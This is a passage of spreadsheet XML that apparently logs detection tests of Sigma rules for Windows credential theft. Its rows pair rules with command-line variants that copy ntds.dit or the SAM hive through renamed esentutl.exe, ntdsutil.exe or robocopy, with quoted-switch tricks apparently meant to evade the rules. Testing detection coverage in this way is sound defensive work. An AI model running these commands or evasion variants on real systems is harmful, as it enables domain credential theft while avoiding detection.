        <v>1</v>
      </c>
      <c r="G277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J277" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="43" t="n"/>
      <c r="B278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C278" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D278" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E278" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\dbtool.exe &amp;&amp; C:\temp\dbtool.exe /"p" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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278" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="43" t="n"/>
      <c r="B279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C279" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D279" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E279" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\dbtool.exe &amp;&amp; C:\temp\dbtool.exe /P C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I279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279" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="n"/>
      <c r="B280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C280" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D280" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E280" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J280" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="43" t="n"/>
      <c r="B281" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C281" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D281" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E281" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J281" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="n"/>
      <c r="B282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C282" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D282" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E282" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe,/p,C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="43" t="n"/>
      <c r="B283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C283" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D283" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E283" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p /d ntds.dit</t>
        </is>
      </c>
      <c r="F283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I283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283" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="n"/>
      <c r="B284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C284" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D284" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E284" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe -"p" /d ntds.dit</t>
        </is>
      </c>
      <c r="F284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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284" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="n"/>
      <c r="B285" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C285" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D285" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E285" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p /D ntds.dit</t>
        </is>
      </c>
      <c r="F285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I285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285" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="n"/>
      <c r="B286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C286" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D286" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E286" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /"p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="44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286" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="43" t="n"/>
      <c r="B287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C287" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D287" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E287" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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287" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="n"/>
      <c r="B288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C288" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D288" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E288" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /P /d ntds.dit</t>
        </is>
      </c>
      <c r="F288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Esentutl Gather Credentials (7df1713a-1a5b-4a4b-a071-dc83b144a101); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J288" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K288" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="43" t="n"/>
      <c r="B289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C289" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D289" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E289" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe -"p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J289" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="n"/>
      <c r="B290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C290" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D290" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E290" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /d ntds.dit</t>
        </is>
      </c>
      <c r="F290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J290" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="43" t="n"/>
      <c r="B291" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C291" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D291" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E291" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /D ntds.dit</t>
        </is>
      </c>
      <c r="F291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J291" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="n"/>
      <c r="B292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C292" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D292" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E292" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/P" -d ntds.dit</t>
        </is>
      </c>
      <c r="F292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="n"/>
      <c r="B293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C293" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D293" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E293" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" -d ntds.dit</t>
        </is>
      </c>
      <c r="F293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J293" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K293" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C294" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D294" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E294" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" /"d" ntds.dit</t>
        </is>
      </c>
      <c r="F294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J294" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K294" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C295" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D295" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E295" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H295" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J295" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K295" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C296" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D296" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E296" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /"d" ntds.dit</t>
        </is>
      </c>
      <c r="F296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J296" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K296" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C297" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D297" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E297" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe /"y" C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F297" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="4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97" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K297" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="n"/>
      <c r="B298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C298" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D298" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E298" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe /Y C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="44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98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K298" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C299" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D299" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E299" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe -"y" C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C300" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D300" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E300" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/y" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I300" s="43" t="n"/>
      <c r="J300" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C301" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D301" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E301" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/Y" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I301" s="43" t="n"/>
      <c r="J301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C302" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D302" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E302" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/y"" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I302" s="43" t="n"/>
      <c r="J302" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ntdsutil_susp_usage</t>
        </is>
      </c>
      <c r="C303" s="44" t="inlineStr">
        <is>
          <t>Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)</t>
        </is>
      </c>
      <c r="D303" s="44" t="inlineStr">
        <is>
          <t>a58353df-af43-4753-bad0-cd83ef35eef5</t>
        </is>
      </c>
      <c r="E303" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\ntdsutil.exe C:\temp\win_diag.exe &amp;&amp; C:\temp\win_diag.exe snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit</t>
        </is>
      </c>
      <c r="F303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C304" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D304" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E304" s="44" t="inlineStr">
        <is>
          <t>robocopy C:\Windows\NTDS\ C:\exfil\ ntds.dit</t>
        </is>
      </c>
      <c r="F304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G304" s="44" t="b">
        <v>0</v>
      </c>
